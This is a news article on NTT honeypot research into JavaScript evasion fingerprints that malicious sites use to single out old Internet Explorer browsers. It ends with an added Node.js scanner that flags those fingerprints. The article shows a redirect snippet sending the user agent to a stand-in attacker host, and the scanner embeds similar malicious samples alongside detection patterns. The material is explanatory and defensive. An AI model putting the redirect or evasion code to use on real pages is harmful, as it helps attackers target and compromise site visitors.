How evil JavaScript helps attackers tag possible victims – and gives away their intent

Countdown to ancient IE a telltale sign of malice

A honeypot project operated by Japanese comms company NTT has turned up a bunch of new approaches to malware obfuscation.

Yuta Takata of NTT's Secure Platform Laboratories has published an analysis at the Asia Pacific Network Information Centre (APNIC) here. In it, he wrote that since JavaScript can be used to identify different (and vulnerable) browsers, it's worth watching to see if malware authors are using it that way.

Takata's group identified five evasion techniques, all of which abuse differences between JavaScript implementations, he stated; this is more complex than the familiar redirection attacks that inspect the User-Agent string and send victims to pages specific to their browser.

In other words, this code would redirect an Internet Explorer 8 user to an attack site, but leave others alone:

var ua = navigator.userAgent;
if (ua.indexOf("MSIE 8") > -1) {
    var ifr = document.createElement("iframe");
    ifr.setAttribute("src", "http://mal.example/ua=" + ua);
    document.body.appendChild(ifr);
}

It matters, Takata said, because the evasion techniques identified in the research can serve as attack signatures.

The NTT team took two approaches to traffic collection: a "high interaction" honeyclient (a real browser designed to detect browser exploits), and a "low interaction" honeyclient that can "emulate many different client profiles, trace complicated redirections and hook code executions in detail".

Over several years, the NTT group collected and analysed 8,500 JavaScript samples from 20,000-plus malicious sites, and found five previously unseen evasion techniques as shown below.

Evasion technique                       Evasive code
Use of original object                  window.sidebar
Difference in array processing          ["a","b",].length
Difference in string processing         "\v"=="v"
Difference in setTimeout() processing   setTimeout(10)
Difference in parseInt() processing     parseInt("0123")

Takata wrote that, of these, setTimeout() provided the best indicator of compromise (IOC), mainly because the other four are no longer in current use.

That particular function helped attackers identify IE 8 and IE 9 browsers, because they return an "Invalid argument" error if a site asks them to process setTimeout(10); Firefox and Chrome don't.

That code turned out to be the strongest IOC of the five evasive code snippets NTT identified in its scan of more than 860,000 URLs: all 26 URLs that served up setTimeout(10) were on compromised websites belonging to a mass "Fake jQuery" injection campaign. The other samples turned out to be either benign or no longer in use. ®
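As an added example, not code from the NTT research or from the article, here is a small Node.js triage scanner that flags the five fingerprints from the table in collected script samples and, following the finding above, treats setTimeout(number) as the strong indicator. The regexes, signature names and sample scripts are constructed for this illustration; the legacy-engine behaviours in the comments are the article's (setTimeout) and well-known engine history (the other four).

```javascript
// Added example, not code from the NTT study or the article: a static triage
// scanner for the five evasion fingerprints the research catalogued. Regexes and
// sample scripts are constructed here; legacy-engine behaviours are noted per line.
const EVASION_SIGNATURES = [
  // window.sidebar is a Firefox-only object, so probing it singles out Firefox
  { name: "window.sidebar",        re: /\bwindow\s*\.\s*sidebar\b/ },
  // trailing comma in an array literal: length 2 today, 3 in old Internet Explorer
  { name: "trailing-comma array",  re: /\[[^\]]*,\s*\]\s*\.\s*length\b/ },
  // "\v" is a vertical tab in modern engines; old IE kept it as the letter v
  { name: '"\\v" comparison',      re: /["']\\v["']\s*===?\s*["']v["']/ },
  // setTimeout with only a delay throws "Invalid argument" in IE 8/9, per the article
  { name: "setTimeout(number)",    re: /\bsetTimeout\s*\(\s*\d+\s*\)/ },
  // leading-zero string parsed as octal (83) in pre-ES5 engines, decimal (123) now
  { name: "parseInt leading zero", re: /\bparseInt\s*\(\s*["']0\d+["']\s*\)/ },
];

// Names of every evasion fingerprint present in a script's source text.
function scanForEvasion(src) {
  return EVASION_SIGNATURES.filter((s) => s.re.test(src)).map((s) => s.name);
}

// Triage verdict following the article's finding: setTimeout(number) was the one
// fingerprint that only appeared on compromised sites, so it ranks as the strong IOC.
function triage(src) {
  const hits = scanForEvasion(src);
  if (hits.includes("setTimeout(number)")) return "strong";
  return hits.length > 0 ? "weak" : "none";
}

// Constructed samples: a probe modelled on the setTimeout(10) pattern, a script that
// chains three of the other probes, and a benign script using the same APIs normally.
const SAMPLES = {
  timeoutProbe:
    "var old=false;try{setTimeout(10)}catch(e){old=true}\n" +
    'if(old){var f=document.createElement("iframe");f.src="http://mal.example/";document.body.appendChild(f)}',
  multiProbe:
    'if(["a","b",].length==3||"\\v"=="v"||parseInt("0123")==83){location="http://mal.example/"}',
  benign:
    'setTimeout(function(){console.log("tick")},10); parseInt("10",10); var a=["a","b"].length;',
};

for (const [label, src] of Object.entries(SAMPLES)) {
  console.log(label, triage(src), scanForEvasion(src));
}
```

Run it over a directory of collected samples instead of the inline SAMPLES to get a first-pass ranking; a "strong" verdict is a hunting lead, not proof of compromise on its own.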
